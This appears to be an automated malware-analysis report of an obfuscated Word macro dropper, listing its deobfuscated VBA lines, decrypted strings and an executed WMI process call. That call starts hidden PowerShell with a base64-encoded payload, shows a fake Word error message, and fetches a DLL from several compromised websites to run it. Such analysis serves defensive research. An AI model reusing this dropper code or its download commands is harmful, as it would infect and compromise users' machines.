[ sh bbwx [ sh bBJx [ sh bAEx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bdAx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBhx [ sh bAEx [ sh b4Ax [ sh bYQx [ sh bBnx [ sh bACx [ sh bcAx [ sh bKQx [ sh bApx [ sh bACx ) -> 27204

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        SlFMhE

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        TtNYEBE

                                                        MidB$

                                                        Create

                                                        SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwA,,) -> 0

                                                        Koy_r2oxzs1

                                                        X2yj58n39t50co

                                                        kxpwbBJF

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        UYxXOcIJG

                                                        MidB$

                                                        StringsDecrypted Strings
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "x [ sh bpx [ sh b"
                                                        "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "x [ sh bx [ sh b"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        LineInstructionMeta Information
                                                        2

                                                        Function Cfqzsexf2_k()

                                                        3

                                                        Goto duvyGCCDG

                                                        executed
                                                        4

                                                        Set IacBICp = IFmVwCk

                                                        IFmVwCk

                                                        5

                                                        Dim wzeYO, ZXUkHUDE, dWLbDBA as Long

                                                        6

                                                        Dim bZSWsqlD as Word.Paragraph

                                                        7

                                                        Dim wqMdGGa() as Byte

                                                        8

                                                        For Each bZSWsqlD in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        9

                                                        wqMdGGa = bZSWsqlD.Range

                                                        Range

                                                        10

                                                        dscc = "sadsaccc" & bZSWsqlD.Range

                                                        Range

                                                        11

                                                        ZXUkHUDE = UBound(wqMdGGa) - 1

                                                        UBound

                                                        12

                                                        wzeYO = 0

                                                        13

                                                        Set oTxSFKM = PwelHHe

                                                        PwelHHe

                                                        14

                                                        Do Until ZXUkHUDE > ZXUkHUDE

                                                        15

                                                        If wqMdGGa(ZXUkHUDE) = 46 Or ZXUkHUDE = ZXUkHUDE Then

                                                        16

                                                        dscc = "sasdsacc" & (wzeYO / 2) + 1 & " to " & (ZXUkHUDE / 2) + 1 & MidB$(wqMdGGa, wzeYO + 1, ZXUkHUDE - wzeYO + 3)

                                                        MidB$

                                                        17

                                                        wzeYO = ZXUkHUDE + 2

                                                        18

                                                        Endif

                                                        19

                                                        ZXUkHUDE = ZXUkHUDE + 2

                                                        20

                                                        Loop

                                                        21

                                                        Next

                                                        Paragraphs

                                                        21

                                                        duvyGCCDG:

                                                        23

                                                        skuwd = Ga63a6ozyok1lu + Tvh1u8793dltn9.Content + P74x_w06z8wy

                                                        Ga63a6ozyok1lu

                                                        Content

                                                        P74x_w06z8wy

                                                        26

                                                        Goto NreFC

                                                        27

                                                        Set zkqnNAIz = DOUPnxsoh

                                                        DOUPnxsoh

                                                        28

                                                        Dim ofBYJAJ, LfOAoxD, gNcNXLsAj as Long

                                                        29

                                                        Dim BMfqCFLcE as Word.Paragraph

                                                        30

                                                        Dim zxBvQRHoF() as Byte

                                                        31

                                                        For Each BMfqCFLcE in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        32

                                                        zxBvQRHoF = BMfqCFLcE.Range

                                                        Range

                                                        33

                                                        dscc = "sadsaccc" & BMfqCFLcE.Range

                                                        Range

                                                        34

                                                        LfOAoxD = UBound(zxBvQRHoF) - 1

                                                        UBound

                                                        35

                                                        ofBYJAJ = 0

                                                        36

                                                        Set GXzgs = tmhzE

                                                        tmhzE

                                                        37

                                                        Do Until LfOAoxD > LfOAoxD

                                                        38

                                                        If zxBvQRHoF(LfOAoxD) = 46 Or LfOAoxD = LfOAoxD Then

                                                        39

                                                        dscc = "sasdsacc" & (ofBYJAJ / 2) + 1 & " to " & (LfOAoxD / 2) + 1 & MidB$(zxBvQRHoF, ofBYJAJ + 1, LfOAoxD - ofBYJAJ + 3)

                                                        MidB$

                                                        40

                                                        ofBYJAJ = LfOAoxD + 2

                                                        41

                                                        Endif

                                                        42

                                                        LfOAoxD = LfOAoxD + 2

                                                        43

                                                        Loop

                                                        44

                                                        Next

                                                        Paragraphs

                                                        44

                                                        NreFC:

                                                        46

                                                        wjnsc = "x [ sh bpx [ sh b"

                                                        47

                                                        T8m6rm0ljeoit = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"

                                                        48

                                                        Goto fNBrHlEAv

                                                        49

                                                        Set JJlPCJ = obTyv

                                                        obTyv

                                                        50

                                                        Dim wJpzu, IFdNKp, KgsfYDHSH as Long

                                                        51

                                                        Dim rVJUDUKH as Word.Paragraph

                                                        52

                                                        Dim cXPNdFE() as Byte

                                                        53

                                                        For Each rVJUDUKH in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        54

                                                        cXPNdFE = rVJUDUKH.Range

                                                        Range

                                                        55

                                                        dscc = "sadsaccc" & rVJUDUKH.Range

                                                        Range

                                                        56

                                                        IFdNKp = UBound(cXPNdFE) - 1

                                                        UBound

                                                        57

                                                        wJpzu = 0

                                                        58

                                                        Set XHCLGl = JoHgzC

                                                        JoHgzC

                                                        59

                                                        Do Until IFdNKp > IFdNKp

                                                        60

                                                        If cXPNdFE(IFdNKp) = 46 Or IFdNKp = IFdNKp Then

                                                        61

                                                        dscc = "sasdsacc" & (wJpzu / 2) + 1 & " to " & (IFdNKp / 2) + 1 & MidB$(cXPNdFE, wJpzu + 1, IFdNKp - wJpzu + 3)

                                                        MidB$

                                                        62

                                                        wJpzu = IFdNKp + 2

                                                        63

                                                        Endif

                                                        64

                                                        IFdNKp = IFdNKp + 2

                                                        65

                                                        Loop

                                                        66

                                                        Next

                                                        Paragraphs

                                                        66

                                                        fNBrHlEAv:

                                                        68

                                                        Cyum5s6729q4h = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"

                                                        69

                                                        Goto KAIEzBBDB

                                                        70

                                                        Set lMxOJUo = BYQeC

                                                        BYQeC

                                                        71

                                                        Dim mDUMGI, KwsnJ, cwrlb as Long

                                                        72

                                                        Dim PlllYA as Word.Paragraph

                                                        73

                                                        Dim bIdgDIKT() as Byte

                                                        74

                                                        For Each PlllYA in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        75

                                                        bIdgDIKT = PlllYA.Range

                                                        Range

                                                        76

                                                        dscc = "sadsaccc" & PlllYA.Range

                                                        Range

                                                        77

                                                        KwsnJ = UBound(bIdgDIKT) - 1

                                                        UBound

                                                        78

                                                        mDUMGI = 0

                                                        79

                                                        Set OELBME = PpRoB

                                                        PpRoB

                                                        80

                                                        Do Until KwsnJ > KwsnJ

                                                        81

                                                        If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then

                                                        82

                                                        dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)

                                                        MidB$

                                                        83

                                                        mDUMGI = KwsnJ + 2

                                                        84

                                                        Endif

                                                        85

                                                        KwsnJ = KwsnJ + 2

                                                        86

                                                        Loop

                                                        87

                                                        Next

                                                        Paragraphs

                                                        87

                                                        KAIEzBBDB:

                                                        89

                                                        D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"

                                                        90

                                                        Goto OXSmB

                                                        91

                                                        Set opZGEJ = OfcyMA

                                                        OfcyMA

                                                        92

                                                        Dim UZSgXY, SWiOAACq, axfnb as Long

                                                        93

                                                        Dim RSOyLFC as Word.Paragraph

                                                        94

                                                        Dim qZUuB() as Byte

                                                        95

                                                        For Each RSOyLFC in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        96

                                                        qZUuB = RSOyLFC.Range

                                                        Range

                                                        97

                                                        dscc = "sadsaccc" & RSOyLFC.Range

                                                        Range

                                                        98

                                                        SWiOAACq = UBound(qZUuB) - 1

                                                        UBound

                                                        99

                                                        UZSgXY = 0

                                                        100

                                                        Set fFCxQGp = VFEoD

                                                        VFEoD

                                                        101

                                                        Do Until SWiOAACq > SWiOAACq

                                                        102

                                                        If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then

                                                        103

                                                        dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)

                                                        MidB$

                                                        104

                                                        UZSgXY = SWiOAACq + 2

                                                        105

                                                        Endif

                                                        106

                                                        SWiOAACq = SWiOAACq + 2

                                                        107

                                                        Loop

                                                        108

                                                        Next

                                                        Paragraphs

                                                        108

                                                        OXSmB:

                                                        110

                                                        C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"

                                                        Mid

                                                        Name

                                                        Application

                                                        111

                                                        Goto rYDvv

                                                        112

                                                        Set GOSKJ = AOSGE

                                                        AOSGE

                                                        113

                                                        Dim pblpJEP, yNTJYEFj, EFfaBWHC as Long

                                                        114

                                                        Dim OlVYDaAK as Word.Paragraph

                                                        115

                                                        Dim iVxnxGH() as Byte

                                                        116

                                                        For Each OlVYDaAK in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        117

                                                        iVxnxGH = OlVYDaAK.Range

                                                        Range

                                                        118

                                                        dscc = "sadsaccc" & OlVYDaAK.Range

                                                        Range

                                                        119

                                                        yNTJYEFj = UBound(iVxnxGH) - 1

                                                        UBound

                                                        120

                                                        pblpJEP = 0

                                                        121

                                                        Set bquxP = zIlZF

                                                        zIlZF

                                                        122

                                                        Do Until yNTJYEFj > yNTJYEFj

                                                        123

                                                        If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then

                                                        124

                                                        dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)

                                                        MidB$

                                                        125

                                                        pblpJEP = yNTJYEFj + 2

                                                        126

                                                        Endif

                                                        127

                                                        yNTJYEFj = yNTJYEFj + 2

                                                        128

                                                        Loop

                                                        129

                                                        Next

                                                        Paragraphs

                                                        129

                                                        rYDvv:

                                                        131

                                                        Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit

                                                        132

                                                        Goto tgyiIBI

                                                        133

                                                        Set yJRyW = IeEnJ

                                                        IeEnJ

                                                        134

                                                        Dim FJGWlF, boTEsG, DAKdJA as Long

                                                        135

                                                        Dim kjSGfNWH as Word.Paragraph

                                                        136

                                                        Dim NTrejcdK() as Byte

                                                        137

                                                        For Each kjSGfNWH in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        138

                                                        NTrejcdK = kjSGfNWH.Range

                                                        Range

                                                        139

                                                        dscc = "sadsaccc" & kjSGfNWH.Range

                                                        Range

                                                        140

                                                        boTEsG = UBound(NTrejcdK) - 1

                                                        UBound

                                                        141

                                                        FJGWlF = 0

                                                        142

                                                        Set LVHhGsGJd = PRawGB

                                                        PRawGB

                                                        143

                                                        Do Until boTEsG > boTEsG

                                                        144

                                                        If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then

                                                        145

                                                        dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)

                                                        MidB$

                                                        146

                                                        FJGWlF = boTEsG + 2

                                                        147

                                                        Endif

                                                        148

                                                        boTEsG = boTEsG + 2

                                                        149

                                                        Loop

                                                        150

                                                        Next

                                                        Paragraphs

                                                        150

                                                        tgyiIBI:

                                                        152

                                                        Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)

                                                        153

                                                        Goto urNCUFJBF

                                                        154

                                                        Set aekya = NDNfzBJJ

                                                        NDNfzBJJ

                                                        155

                                                        Dim QyRiIm, WEIxlI, rZGGJBDEH as Long

                                                        156

                                                        Dim EvkuEA as Word.Paragraph

                                                        157

                                                        Dim ZFzwZcA() as Byte

                                                        158

                                                        For Each EvkuEA in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        159

                                                        ZFzwZcA = EvkuEA.Range

                                                        Range

                                                        160

                                                        dscc = "sadsaccc" & EvkuEA.Range

                                                        Range

                                                        161

                                                        WEIxlI = UBound(ZFzwZcA) - 1

                                                        UBound

                                                        162

                                                        QyRiIm = 0

                                                        163

                                                        Set Gownu = BLbjEJvG

                                                        BLbjEJvG

                                                        164

                                                        Do Until WEIxlI > WEIxlI

                                                        165

                                                        If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then

                                                        166

                                                        dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)

                                                        MidB$

                                                        167

                                                        QyRiIm = WEIxlI + 2

                                                        168

                                                        Endif

                                                        169

                                                        WEIxlI = WEIxlI + 2

                                                        170

                                                        Loop

                                                        171

                                                        Next

                                                        Paragraphs

                                                        171

                                                        urNCUFJBF:

                                                        173

                                                        Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)

                                                        CreateObject("winmgmts:win32_process")

                                                        executed
                                                        174

                                                        Goto TQOflAN

                                                        175

                                                        Set arTLjQ = BeNoB

                                                        BeNoB

                                                        176

                                                        Dim iqpwDAG, nSFIYBiG, KqVudsGK as Long

                                                        177

                                                        Dim wFpBJBJE as Word.Paragraph

                                                        178

                                                        Dim bKloWCbL() as Byte

                                                        179

                                                        For Each wFpBJBJE in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        180

                                                        bKloWCbL = wFpBJBJE.Range

                                                        Range

                                                        181

                                                        dscc = "sadsaccc" & wFpBJBJE.Range

                                                        Range

                                                        182

                                                        nSFIYBiG = UBound(bKloWCbL) - 1

                                                        UBound

                                                        183

                                                        iqpwDAG = 0

                                                        184

                                                        Set Mpmet = qqdsB

                                                        qqdsB

                                                        185

                                                        Do Until nSFIYBiG > nSFIYBiG

                                                        186

                                                        If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then

                                                        187

                                                        dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)

                                                        MidB$

                                                        188

                                                        iqpwDAG = nSFIYBiG + 2

                                                        189

                                                        Endif

                                                        190

                                                        nSFIYBiG = nSFIYBiG + 2

                                                        191

                                                        Loop

                                                        192

                                                        Next

                                                        Paragraphs

                                                        192

                                                        TQOflAN:

                                                        194

                                                        njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))

                                                        Mid

                                                        Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx 